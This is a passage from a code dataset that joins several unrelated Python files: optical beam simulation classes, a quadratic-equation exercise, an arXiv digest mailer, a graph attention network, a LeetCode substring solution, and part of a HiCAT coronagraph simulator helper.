'_zmax',\n '_R',\n '_L',\n '_qr')\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n ScalarBesselGaussBeam.__init__(self)\n\n self.beams = [self]\n self.name = 'scalar-bessel-gauss-beam-superposition'\n\n self._N = None\n self._zmax = None\n self._R = None\n self._L = None\n self._qr = None\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n self.__create_superposition()\n\n @property\n def q(self):\n return self._q\n\n @q.setter\n def q(self, value):\n self._q = value\n\n if value == 0:\n self.gaussian_spot = ma.inf\n elif cm.isinf(value):\n self.gaussian_spot = 0\n else:\n self.gaussian_spot = ma.sqrt(1/value.real)\n\n self.__create_superposition()\n\n @property\n def N(self):\n return self._N\n\n @N.setter\n def N(self, N):\n self._N = N\n self.__create_superposition()\n\n @property\n def zmax(self):\n return self._zmax\n\n @zmax.setter\n def zmax(self, value):\n self._zmax = value\n\n if (self.axicon_angle is None and self.R is not None):\n self.axicon_angle = ma.atan(self.R/self.zmax)\n\n if (self.axicon_angle is not None and self.R is None):\n self.R = (self.zmax*ma.tan(self.axicon_angle))\n\n self.__create_superposition()\n\n @property\n def R(self):\n return self._R\n\n @R.setter\n def R(self, value):\n self._R = value\n\n if self.L is None:\n self.L = 3*value**2\n\n if self.axicon_angle is None and self.zmax is not None:\n self.axicon_angle = ma.atan(value/self.zmax)\n\n if self.axicon_angle is not None and self.zmax is None:\n if self.axicon_angle == 0:\n self.zmax = ma.inf\n else:\n self.zmax = value/ma.tan(self.axicon_angle)\n\n self.__create_superposition()\n\n @property\n def axicon_angle(self):\n return self._axicon_angle\n\n @axicon_angle.setter\n def axicon_angle(self, theta):\n self._axicon_angle = theta\n self._axicon_angle_degree = 180*theta/pi\n\n if self.longitudinal_wavenumber is not None:\n kz = self.longitudinal_wavenumber\n if theta != pi/2:\n self.wavenumber = kz/ma.cos(theta)\n\n if self.transversal_wavenumber is not None:\n krho = self.transversal_wavenumber\n if theta != 0:\n self.wavenumber = krho/ma.sin(theta)\n\n if self.zmax is None and self.R is not None:\n self.zmax = self.R/ma.tan(theta)\n\n if self.zmax is not None and self.R is None:\n self.R = self.zmax*ma.tan(theta)\n\n if self.wavenumber is not None:\n self.wavenumber = self.wavenumber\n\n self.__create_superposition()\n\n @property\n def L(self):\n return self._L\n\n @L.setter\n def L(self, L):\n self._L = L\n if self.qr is None:\n self.qr = 6/L\n self.__create_superposition()\n\n @property\n def qr(self):\n return self._qr\n\n @qr.setter\n def qr(self, qr):\n self._qr = qr\n self.__create_superposition()\n\n def __create_superposition(self):\n if Beam.is_all_params_defined(self) is False:\n return\n\n def amplitude_n(n):\n arg = (self.qr - self.q - 2j*pi*n/self.L)*self.R**2\n den = self.L*(self.qr-self.q)/2 - 1j*pi*n\n if den != 0:\n return cm.sinh(arg)/den\n elif den == 0 and arg == 0:\n return 2*self.R**2/self.L\n else:\n return 0\n\n self.beams = []\n\n for i in range(2*self.N + 1):\n n_index = i - self.N\n beam = ScalarBesselGaussBeam()\n beam.amplitude = amplitude_n(n_index)\n beam.wavelength = self.wavelength\n beam.medium_refractive_index = self.medium_refractive_index\n beam.transversal_wavenumber = self.transversal_wavenumber\n beam.q = (self.qr - 1j*2*pi*n_index/self.L)\n self.beams.append(beam)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.psi(x1, x2, x3, system) for beam in self.beams]))\n\n\nclass ScalarFrozenWave(Beam):\n intrinsic_params = ('_Q',\n '_N',\n '_L',\n '_bessel_order',\n '_reference_function',)\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, centered=True, **kwargs):\n Beam.__init__(self, self)\n self.name = 'scalar-frozen-wave'\n self.beams = [self]\n self.centered = centered\n\n self._Q = None\n self._N = None\n self._L = None\n self._bessel_order = 0\n self._reference_function = None # string\n self.func = None # function\n #self.amplitudes = []\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n self.__create_superposition()\n\n @property\n def Q(self):\n return self._Q\n\n @Q.setter\n def Q(self, value):\n self._Q = value\n self.__create_superposition()\n\n @property\n def N(self):\n return self._N\n\n @N.setter\n def N(self, value):\n self._N = value\n self.__create_superposition()\n\n @property\n def L(self):\n return self._L\n\n @L.setter\n def L(self, value):\n self._L = value\n self.__create_superposition()\n\n @property\n def bessel_order(self):\n return self._bessel_order\n\n @bessel_order.setter\n def bessel_order(self, value):\n self._bessel_order = value\n\n @property\n def reference_function(self):\n return self.func\n\n @reference_function.setter\n def reference_function(self, func):\n self.func = func\n self._reference_function = '%s' % func.__name__\n self.__create_superposition()\n\n def __create_superposition(self):\n if (Beam.is_all_params_defined(self) is False or self.func is None):\n return\n\n def amplitude_n(n):\n func_real = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).real\n func_imag = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).imag\n if self.centered:\n an_real, err = quad(func_real, -self.L/2, self.L/2)\n an_imag, err = quad(func_imag, -self.L/2, self.L/2)\n else:\n an_real, err = quad(func_real, 0, self.L)\n an_imag, err = quad(func_imag, 0, self.L)\n return (an_real + 1j*an_imag)/self.L\n\n if 2*pi*self.N/self.L > self.wavenumber/2:\n error_msg = 'Combination of N, L and k does not '\n error_msg += 'satisfy Q range condition.'\n raise NameError(error_msg)\n\n if self.Q + 2*pi*self.N/self.L > self.wavenumber:\n msg = 'Q is too large. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = self.wavenumber - 2*pi*self.N/self.L\n msg += 'to %fk.' % (self.Q/self.wavenumber)\n print(msg)\n\n if self.Q - 2*pi*self.N/self.L < 0:\n msg = 'Q is too low. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = 2*pi*self.N/self.L\n msg += 'to %fk.' % (self.Q/self.wavenumber)\n print(msg)\n\n self.beams = []\n for i in range(2*self.N + 1):\n n_index = i - self.N\n beam = ScalarBesselBeam()\n beam.amplitude = amplitude_n(n_index)\n beam.wavelength = self.wavelength\n beam.medium_refractive_index = self.medium_refractive_index\n beam.longitudinal_wavenumber = self.Q + 2*pi*n_index/self.L\n beam.bessel_order = self.bessel_order\n self.beams.append(beam)\n\n def psi(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.psi(x1, x2, x3, system) for beam in self.beams]))\n\n\nclass VectorialBeam(Beam):\n intrinsic_params = ()\n\n params = Beam.params + intrinsic_params\n\n def __init__(self, beams, name='generic-vectorial-beam'):\n Beam.__init__(self, beams, name)\n\n def __add__(self, other):\n # raise error if one generic params if different from another.\n if self.wavelength != other.wavelength:\n raise NameError('Beams with differents wavelength')\n if self.vacuum_wavelength != other.vacuum_wavelength:\n raise NameError('Beams with differents vacuum_wavelength')\n\n # effetuate the sum because all generic params are equal.\n beams = []\n for beam in self.beams:\n if len(self.beams) > 1:\n beam._amplitude *= self._amplitude\n beam._phase += self._phase\n beams.append(copy.copy(beam))\n\n for beam in other.beams:\n if len(other.beams) > 1:\n beam._amplitude *= other._amplitude\n beam._phase += other._phase\n beams.append(copy.copy(beam))\n\n return VectorialBeam(beams)\n\n def Ex(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Ex(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Ey(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Ey(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Ez(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Ez(x1, x2, x3, system)\n for beam in self.beams]))\n\n def E(self, x1, x2, x3, system='cartesian'):\n return (self.Ex(x1, x2, x3, system),\n self.Ey(x1, x2, x3, system),\n self.Ez(x1, x2, x3, system),)\n\n def electric_field(self, x1, x2, x3, system='cartesian'):\n return self.E(x1, x2, x3, system)\n\n def Hx(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Hx(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Hy(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Hy(x1, x2, x3, system)\n for beam in self.beams]))\n\n def Hz(self, x1, x2, x3, system='cartesian'):\n return (self._amplitude*cm.exp(1j*self._phase)\n *sum([beam.Hz(x1, x2, x3, system)\n for beam in self.beams]))\n\n def H(self, x1, x2, x3, system='cartesian'):\n return (self.Hx(x1, x2, x3, system),\n self.Hy(x1, x2, x3, system),\n self.Hz(x1, x2, x3, system),)\n\n def magnetic_field(self, x1, x2, x3, system='cartesian'):\n return self.H(x1, x2, x3, system)\n\n def intensity(self, x1, x2, x3, system='cartesian'):\n Ex, Ey, Ez = self.E(x1, x2, x3, system)\n return abs(Ex)**2 + abs(Ey)**2 + abs(Ez)**2\n\n def electric_field_direction(self, x1, x2, x3, system='cartesian'):\n E0 = [E.real for E in self.E(x1, x2, x3, system)]\n E0_abs = np.linalg.norm(E0)\n return [E/E0_abs for E in E0]\n\n def wavenumber_direction(self, x1, x2, x3, system='cartesian'):\n wdir = np.cross(self.E(x1, x2, x3, system),\n np.conjugate(self.H(x1, x2, x3, system)))\n wdir = [wd.real for wd in wdir]\n wdir_abs = np.linalg.norm(wdir)\n return [wd/wdir_abs for wd in wdir]\n\n\nclass VectorialBesselBeam(ScalarBesselBeam, VectorialBeam):\n intrinsic_params = ScalarBesselBeam.intrinsic_params\n intrinsic_params += VectorialBeam.intrinsic_params\n params = VectorialBeam.params + intrinsic_params\n\n def __init__(self, **kwargs):\n ScalarBesselBeam.__init__(self)\n VectorialBeam.__init__(self, self)\n\n self.beams = [self]\n self.name = 'vectorial-bessel-beam'\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n #def wavenumber_direction(self, x1, x2, x3, system='cartesian'):\n # return super(ScalarBesselBeam, self).wavenumber_direction(x1, x2, x3, system)\n\n def __some_params(self):\n return (self._longitudinal_wavenumber,\n self._transversal_wavenumber,\n self._bessel_order,\n self._axicon_angle,)\n\n def Ex(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(+(1+ma.cos(alpha))*ss.jv(ni, krho*rho\n )\n +0.5*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n +cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Ey(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(-0.5j*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n -cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Ez(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n return (self._amplitude*cm.exp(1j*self._phase)\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(+1j*ma.sin(alpha)*(+cm.exp(+1j*phi)\n *ss.jv(ni+1, krho*rho)\n -cm.exp(-1j*phi)\n *ss.jv(ni-1, krho*rho))))\n\n def Hx(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n const = SPEED_OF_LIGHT*VACUUM_PERMEABILITY\n\n return (self._amplitude*cm.exp(1j*self._phase)/const\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(-0.5j*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n -cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Hy(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n const = SPEED_OF_LIGHT*VACUUM_PERMEABILITY\n\n return (self._amplitude*cm.exp(1j*self._phase)/const\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(+(1+ma.cos(alpha))*ss.jv(ni, krho*rho)\n -0.5*(1-ma.cos(alpha))*(+cm.exp(+2j*phi)\n *ss.jv(ni+2, krho*rho)\n +cm.exp(-2j*phi)\n *ss.jv(ni-2, krho*rho))))\n\n def Hz(self, x1, x2, x3, system='cartesian'):\n if system == 'cylindrical':\n rho, phi, z = x1, x2, x3\n else:\n rho, phi, z = Point(x1, x2, x3, system).cylindrical()\n\n kz, krho, ni, alpha = self.__some_params()\n\n const = SPEED_OF_LIGHT*VACUUM_PERMEABILITY\n\n return (self._amplitude*cm.exp(1j*self._phase)/const\n *0.25*(1+ma.cos(alpha))*(-1j)**ni*cm.exp(-1j*kz*z)\n *(ma.sin(alpha)*(+cm.exp(+1j*phi)\n *ss.jv(ni+1, krho*rho)\n +cm.exp(-1j*phi)\n *ss.jv(ni-1, krho*rho))))\n\n def intensity(self, x1, x2, x3, system='cartesian'):\n return super(VectorialBeam, self).intensity(x1, x2, x3, system)\n\n\nclass VectorialFrozenWave(VectorialBeam):\n intrinsic_params = ('_Q',\n '_N',\n '_L',\n '_bessel_order',\n '_reference_function',)\n\n params = VectorialBeam.params + intrinsic_params\n\n def __init__(self, centered=True, **kwargs):\n VectorialBeam.__init__(self, self)\n\n self.name = 'vectorial-frozen-wave'\n self.beams = [self]\n self.centered = centered\n\n self._Q = None\n self._N = None\n self._L = None\n self._bessel_order = 0\n self._reference_function = None # string\n self.func = None # function\n #self.amplitudes = []\n\n for key, value in kwargs.items():\n if hasattr(self, '_' + key):\n setattr(self, key, value)\n\n self.__create_superposition()\n\n @property\n def Q(self):\n return self._Q\n\n @Q.setter\n def Q(self, value):\n self._Q = value\n self.__create_superposition()\n\n @property\n def N(self):\n return self._N\n\n @N.setter\n def N(self, value):\n self._N = value\n self.__create_superposition()\n\n @property\n def L(self):\n return self._L\n\n @L.setter\n def L(self, value):\n self._L = value\n self.__create_superposition()\n\n @property\n def bessel_order(self):\n return self._bessel_order\n\n @bessel_order.setter\n def bessel_order(self, value):\n self._bessel_order = value\n\n @property\n def reference_function(self):\n return self.func\n\n @reference_function.setter\n def reference_function(self, func):\n self.func = func\n self._reference_function = '%s' % func.__name__\n self.__create_superposition()\n\n def __create_superposition(self):\n if (Beam.is_all_params_defined(self) is False or self.func is None):\n return\n\n def amplitude_n(n):\n func_real = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).real\n func_imag = lambda z: (self.func(z)*cm.exp(+2j*pi*z*n/self.L)).imag\n\n if self.centered:\n an_real, err = quad(func_real, -self.L/2, self.L/2)\n an_imag, err = quad(func_imag, -self.L/2, self.L/2)\n else:\n an_real, err = quad(func_real, 0, self.L)\n an_imag, err = quad(func_imag, 0, self.L)\n\n return (an_real + 1j*an_imag)/self.L\n\n if 2*pi*self.N/self.L > self.wavenumber/2:\n error_msg = 'Combination of N, L and k does not '\n error_msg += 'satisfy Q range condition.'\n raise NameError(error_msg)\n\n if self.Q + 2*pi*self.N/self.L > self.wavenumber:\n msg = 'Q is too large. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = self.wavenumber - 2*pi*self.N/self.L\n msg += 'to %fk.' % (self.Q/self.wavenumber)\n print(msg)\n\n if self.Q - 2*pi*self.N/self.L < 0:\n msg = 'Q is too low. '\n msg += 'It was changed from %fk '%(self.Q/self.wavenumber)\n self.Q = 2*pi*self.N/self.L\n msg += 'to %fk.' % (self.Q/self.wavenumber)\n print(msg)\n\n self.beams = []\n for i in range(2*self.N + 1):\n n_index = i - self.N\n beam = VectorialBesselBeam()\n beam.wavelength = self.wavelength\n beam.medium_refractive_index = self.medium_refractive_index\n beam.longitudinal_wavenumber = self.Q + 2*pi*n_index/self.L\n beam.amplitude = (amplitude_n(n_index)*4\n /(1+ma.cos(beam._axicon_angle))**2)\n beam.bessel_order = self.bessel_order\n self.beams.append(beam)\n\n\nclass Point(object):\n def __init__(self, x1, x2, x3, system='cartesian'):\n if system == 'cartesian':\n self.__init(x1, x2, x3)\n elif system == 'cylindrical':\n self.__init(x1*ma.cos(x2), x1*ma.sin(x2), x3)\n elif system == 'spherical':\n self.__init(x1*ma.sin(x2)*ma.cos(x3),\n x1*ma.sin(x2)*ma.sin(x3),\n x1*ma.cos(x2))\n else:\n raise NameError('System not defined. Choose amoung '\n + '\"cartesian\", \"cylindrical\" or \"spherical\".')\n\n def __add__(self, other):\n x = self.x + other.x\n y = self.y + other.y\n z = self.z + other.z\n return Point(x, y, z)\n\n def __radd__(self, other):\n if other == 0:\n return self\n else:\n return self.__add__(other)\n\n def __sub__(self, other):\n x = self.x - other.x\n y = self.y - other.y\n z = self.z - other.z\n return Point(x, y, z)\n\n def __str__(self):\n return (\"cartesian = (%s, %s, %s).\"\n % (str(self.x), str(self.y), str(self.z)) + '\\n'\n + \"cylindrical = (%s, %s, %s).\"\n % (str(self.rho), str(self.phi), str(self.z)) + '\\n'\n + \"spherical = (%s, %s, %s).\"\n % (str(self.r), str(self.theta), str(self.phi)))\n\n def __init(self, x, y, z):\n # cartesian\n self.x = x\n self.y = y\n self.z = z\n\n # cylindrical\n self.rho = ma.sqrt(x**2 + y**2)\n if x != 0:\n self.phi = ma.atan(y/x)\n self.phi += pi if x <= 0 and y >= 0 else 0\n self.phi -= pi if x <= 0 and y < 0 else 0\n else:\n if self.y < 0:\n self.phi = -pi/2\n elif self.y == 0:\n self.phi = 0.0\n else:\n self.phi = pi/2\n\n # spherical\n self.r = ma.sqrt(x**2 + y**2 + z**2)\n if self.r != 0:\n self.theta = ma.acos(z/self.r)\n else:\n self.theta = 0.0\n\n def abs(self):\n return self.r\n\n def normalize(self):\n return [self.x/self.r, self.y/self.r, self.z/self.r]\n\n def cartesian(self):\n return [self.x, self.y, self.z]\n\n def cylindrical(self):\n return [self.rho, self.phi, self.z]\n\n def spherical(self):\n return [self.r, self.theta, self.phi]\n\n\nif __name__ == \"__main__\":\n print(\"Please, visit: https://github.com/arantespp/opticalforces\")\n","repo_name":"arantespp/opticalforces","sub_path":"opticalforces/beam.py","file_name":"beam.py","file_ext":"py","file_size_in_byte":44647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72927560486","text":"#EXERCÍCIOS DA AULA 5\n#Eduardo Maciel Sanchez\n\n#20. Calcula o equações de 2º grau\n\nimport math\n\ndef Ex19():\n \n def calcEqua():\n delta = (b**2)-(4*a*c)\n if (delta < 0):\n print('Não existem raízes reais.')\n elif (delta==0):\n x1 = -b/(2*a)\n print('A única raíz é ',x1)\n else:\n x1 = (-b+(math.sqrt(delta)))/(2*a)\n x2 = (-b-(math.sqrt(delta)))/(2*a)\n print('As raízes são x1=',x1,' e x2= ',x2)\n \n \n \n a = float(input(\"Digite o coeficiente a: \"))\n b = float(input(\"Digite o coeficiente b: \"))\n c = float(input(\"Digite o coeficiente c: \"))\n calcEqua()","repo_name":"DesolateElf-dev/Algoritmos","sub_path":"Algoritmos/modulo_01/Ex20.py","file_name":"Ex20.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18732031489","text":"import datetime\nimport sys\nimport os\nimport csv\nimport pandas as pd\nimport time\n\nsys.path.insert(0, os.path.join(os.path.split(os.getcwd())[0],'src/'))\nfrom arxivbulletin import arxivbulletin\n\ndef openfile(fn):\n # open and read from user provided files\n try:\n results = []\n with open(os.path.join(os.path.split(os.getcwd())[0], fn)) as f:\n for line in f:\n results.append(line.strip())\n return results\n # if files do not exist, create empty array\n except IOError:\n results = []\n return results\n\npath ='/home/bart/Documents/arXiv/cmtucla_arXiv'\n# Go through folders with users\nuser_list = []\nfor subdir, dirs, files in os.walk(os.path.join(path,'users')):\n for folders in dirs:\n user_list.append(folders)\n\n\nfor user in user_list:\n keywords = openfile(os.path.join(path,'users/',user,'keywords.txt'))\n keyauthors = openfile(os.path.join(path,'users/',user,'keyauthors.txt'))\n myconfig = pd.read_csv(os.path.join(path,'users/',user,'config.csv'), header=None, index_col=0, squeeze=True).to_dict()\n myconfig['categories'] = openfile(os.path.join(path,'users/',user,'categories.txt'))\n\n arxivsummary = arxivbulletin(myconfig, keywords, keyauthors)\n arxivsummary.send_report()\n time.sleep(4)\n","repo_name":"bartandrews/cmtucla_arXiv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34677821558","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport random\r\n\r\nfrom Network_weight_init import weight_init\r\n\r\n##forward负责提取每个节点的邻居信息,对应的图处理函数负责实现对应的单节点操作\r\nclass Attention(nn.Module):\r\n def __init__(self,input_channel,output_channel,dev,head=1):\r\n super(Attention,self).__init__()\r\n self.att_line=[]\r\n self.line=[]\r\n self.head=head\r\n self.att_line=nn.Linear(2*output_channel,1,device=dev,bias=False)\r\n self.line=nn.Linear(input_channel,output_channel,device=dev)\r\n #多头注意,此处仅采用最直接的重复线性层构造方法\r\n if head > 1:\r\n self.att_line1=nn.Linear(2*output_channel,1,device=dev,bias=False)\r\n self.line1=nn.Linear(input_channel,output_channel,device=dev)\r\n if head > 2:\r\n self.att_line2=nn.Linear(2*output_channel,1,device=dev,bias=False)\r\n self.line2=nn.Linear(input_channel,output_channel,device=dev)\r\n if head > 3:\r\n self.att_line3=nn.Linear(2*output_channel,1,device=dev,bias=False)\r\n self.line3=nn.Linear(input_channel,output_channel,device=dev)\r\n self.device=dev\r\n def forward(self,X,A):\r\n node_num,_=A.size()\r\n first=True\r\n load_list=range(node_num)\r\n for i in load_list:\r\n neibor_feature=X[A[i].bool()]\r\n if(first): result=Attention.att(self,X[i],neibor_feature); first=False\r\n else: result=torch.cat((result,Attention.att(self,X[i],neibor_feature)),dim=0)\r\n return result\r\n def att(self,xi,xj):\r\n node_num,feature_num=xj.size()\r\n #result=torch.tensor(0,dtype=torch.float,device=self.device,requires_grad=True)\r\n xj=torch.cat((xi.view(-1,feature_num),xj),dim=0)\r\n xi_bar=self.line(xi)\r\n xj_bar=self.line(xj)\r\n xi_bar=xi_bar.expand(xj_bar.size())\r\n aj=torch.cat((xi_bar,xj_bar),dim=1)\r\n aj=F.leaky_relu(self.att_line(aj)).view(-1)\r\n aj=F.softmax(aj,dim=0)\r\n xj_bar=torch.matmul(aj,xj_bar).view(1,-1)\r\n\r\n if self.head > 1:\r\n xi_bar1=self.line1(xi)\r\n xj_bar1=self.line1(xj)\r\n xi_bar1=xi_bar1.expand(xj_bar1.size())\r\n aj1=torch.cat((xi_bar1,xj_bar1),dim=1)\r\n aj1=F.leaky_relu(self.att_line1(aj1)).view(-1)\r\n aj1=F.softmax(aj1,dim=0)\r\n xj_bar1=torch.matmul(aj1,xj_bar1).view(1,-1)\r\n xj_bar=xj_bar+xj_bar1\r\n if self.head >2:\r\n xi_bar2=self.line2(xi)\r\n xj_bar2=self.line2(xj) \r\n xi_bar2=xi_bar2.expand(xj_bar2.size())\r\n aj2=torch.cat((xi_bar2,xj_bar2),dim=1)\r\n aj2=F.leaky_relu(self.att_line2(aj2)).view(-1)\r\n aj2=F.softmax(aj2,dim=0)\r\n xj_bar2=torch.matmul(aj2,xj_bar2).view(1,-1)\r\n xj_bar=xj_bar+xj_bar2\r\n if self.head >3:\r\n xi_bar3=self.line3(xi)\r\n xj_bar3=self.line3(xj) \r\n xi_bar3=xi_bar3.expand(xj_bar3.size())\r\n aj3=torch.cat((xi_bar3,xj_bar3),dim=1)\r\n aj3=F.leaky_relu(self.att_line3(aj3)).view(-1)\r\n aj3=F.softmax(aj3,dim=0)\r\n xj_bar3=torch.matmul(aj3,xj_bar3).view(1,-1)\r\n xj_bar=xj_bar+xj_bar3\r\n\r\n xj_bar=xj_bar/self.head\r\n #result=result+xj_bar\r\n #result=result/self.head_num\r\n return xj_bar\r\n\r\n\r\nclass GAT(nn.Module):\r\n def __init__(self,feature_num,output_channel1,output_channel2,class_num,dev,dataset_type,head=1,shuffle=True):\r\n super(GAT,self).__init__()\r\n self.device=dev\r\n self.shuffle=shuffle\r\n head1=1\r\n head2=1\r\n if head >1:\r\n head1=head\r\n head2=2\r\n self.Att1=Attention(feature_num,output_channel1,dev,head1)\r\n self.Att2=Attention(output_channel1,output_channel2,dev,head2)\r\n self.line1=nn.Linear(output_channel2,class_num,device=dev)\r\n self.Att1.apply(weight_init)\r\n self.Att2.apply(weight_init)\r\n self.line1.apply(weight_init)\r\n self.dataset_type=dataset_type\r\n self.class_num=class_num\r\n self.feature_num=feature_num\r\n self.output_channel1=output_channel1\r\n\r\n def forward(self,X,A):\r\n X=X.to(self.device)\r\n A=A.to(self.device)\r\n X=self.Att1(X,A)\r\n X=F.dropout(X,training=self.training)\r\n X=self.Att2(X,A)\r\n X=self.line1(X)\r\n if(self.dataset_type == 1):\r\n X=torch.mean(X,dim=0).view(1,-1)\r\n return F.log_softmax(X,dim=1)","repo_name":"Sophie10001b/AI_class_design","sub_path":"GAT.py","file_name":"GAT.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33731245439","text":"# -*- coding:utf-8 -*-\n__author__ = 'yyp'\n__date__ = '2018-5-26 3:42'\n\n'''\nGiven a string, find the length of the longest substring without repeating characters.\nExamples:\nGiven \"abcabcbb\", the answer is \"abc\", which the length is 3.\nGiven \"bbbbb\", the answer is \"b\", with the length of 1.\nGiven \"pwwkew\", the answer is \"wke\", with the length of 3. Note that the answer must be a substring, \"pwke\" is a subsequence and not a substring.\n'''\n\n\nclass Solution:\n \"\"\"\n Time: O(n)\n Space:O(1)\n \"\"\"\n\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n l, res, freq = 0, 0, [False for _ in range(256)]\n for idx, char in enumerate(s):\n if freq[ord(char)]:\n while s[l] != char:\n freq[ord(s[l])] = False\n l += 1\n l += 1\n else:\n freq[ord(char)] = True\n res = max(idx - l + 1, res)\n return res\n","repo_name":"boluopower/leetcode-mypractice","sub_path":"Array/3_longest_substring_without_repeating_characters.py","file_name":"3_longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2665435644","text":"\"\"\"\nThis module contains useful functions to interface with the HiCAT simulator.\n\"\"\"\n\nimport logging\nfrom astropy.io import fits\nimport os\n\nfrom pastis.config import CONFIG_PASTIS\n\nlog = logging.getLogger()\n\ntry:\n import hicat.simulators\nexcept ImportError:\n log.info('HiCAT simulator not imported.')\n\n\ndef set_up_hicat(apply_continuous_dm_maps=False):\n \"\"\"Return a configured instance of the HiCAT simulator.\n\n Sets the pupil mask, whether the IrisAO is in or out, apodizer, Lyot stop and detector. Optionally, loads DM maps\n onto the two continuous face-sheet Boston DMs.\n\n Parameters\n ----------\n apply_continuous_dm_maps : bool, default False\n whether to load BostonDM maps from path specified in configfile\n\n Returns\n -------\n hicat_sim : instance of HICAT_Sim()\n \"\"\"\n\n hicat_sim = hicat.simulators.hicat_sim.HICAT_Sim()\n hicat_sim.iris_dm.flatten()\n\n hicat_sim.pupil_maskmask = CONFIG_PASTIS.get('HiCAT', 'pupil_mask') # I will likely have to implement a new pupil mask\n hicat_sim.iris_ao = CONFIG_PASTIS.get('HiCAT', 'iris_ao')\n hicat_sim.apodizer = CONFIG_PASTIS.get('HiCAT', 'apodizer')\n hicat_sim.lyot_stop = CONFIG_PASTIS.get('HiCAT', 'lyot_stop')\n hicat_sim.detector = 'imager'\n\n log.info(hicat_sim.describe())\n\n # Load Boston DM maps into HiCAT simulator\n if apply_continuous_dm_maps:\n path_to_dh_solution = CONFIG_PASTIS.get('HiCAT', 'dm_maps_path')\n dm1_surface, dm2_surface = read_continuous_dm_maps_hicat(path_to_dh_solution)\n hicat_sim.dm1.set_surface(dm1_surface)\n hicat_sim.dm2.set_surface(dm2_surface)\n\n log.info(f'BostonDM maps applied from {path_to_dh_solution}.')\n\n return hicat_sim\n\n\ndef read_continuous_dm_maps_hicat(path_to_dm_maps):\n \"\"\"Read Boston DM maps from disk and return as one list per DM.\n\n Hijacked partially from StrokeMinimizatoin.restore_last_strokemin_dm_shapes()\n\n Parameters\n ----------\n path_to_dm_maps : string\n absolute path to folder containing DM maps to load\n\n Returns\n -------\n DM1 actuator map array and DM2 actuator map array; in m\n \"\"\"\n\n surfaces = []\n for dmnum in [1, 2]:\n actuators_2d = 